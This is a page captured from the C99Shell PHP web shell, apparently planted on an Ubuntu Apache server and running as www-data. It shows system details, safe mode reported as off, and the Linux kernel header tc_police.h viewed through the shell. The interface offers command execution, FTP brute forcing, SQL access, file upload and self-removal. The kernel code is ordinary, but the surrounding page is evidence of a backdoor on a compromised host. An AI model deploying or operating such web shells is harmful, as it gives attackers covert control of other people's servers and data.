!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-headers-5.4.0-204/include/net/tc_act/   drwxr-xr-x
Free 13.24 GB of 57.97 GB (22.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     tc_police.h (1.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef __NET_TC_POLICE_H
#define __NET_TC_POLICE_H

#include <net/act_api.h>

struct tcf_police_params {
    int            tcfp_result;
    u32            tcfp_ewma_rate;
    s64            tcfp_burst;
    u32            tcfp_mtu;
    s64            tcfp_mtu_ptoks;
    struct psched_ratecfg    rate;
    bool            rate_present;
    struct psched_ratecfg    peak;
    bool            peak_present;
    struct rcu_head rcu;
};

struct tcf_police {
    struct tc_action    common;
    struct tcf_police_params __rcu *params;

    spinlock_t        tcfp_lock ____cacheline_aligned_in_smp;
    s64            tcfp_toks;
    s64            tcfp_ptoks;
    s64            tcfp_t_c;
};

#define to_police(pc) ((struct tcf_police *)pc)

/* old policer structure from before tc actions */
struct tc_police_compat {
    u32            index;
    int            action;
    u32            limit;
    u32            burst;
    u32            mtu;
    struct tc_ratespec    rate;
    struct tc_ratespec    peakrate;
};

static inline bool is_tcf_police(const struct tc_action *act)
{
#ifdef CONFIG_NET_CLS_ACT
    if (act->ops && act->ops->id == TCA_ID_POLICE)
        return true;
#endif
    return false;
}

static inline u64 tcf_police_rate_bytes_ps(const struct tc_action *act)
{
    struct tcf_police *police = to_police(act);
    struct tcf_police_params *params;

    params = rcu_dereference_bh_rtnl(police->params);
    return params->rate.rate_bytes_ps;
}

static inline s64 tcf_police_tcfp_burst(const struct tc_action *act)
{
    struct tcf_police *police = to_police(act);
    struct tcf_police_params *params;

    params = rcu_dereference_bh_rtnl(police->params);
    return params->tcfp_burst;
}

#endif /* __NET_TC_POLICE_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--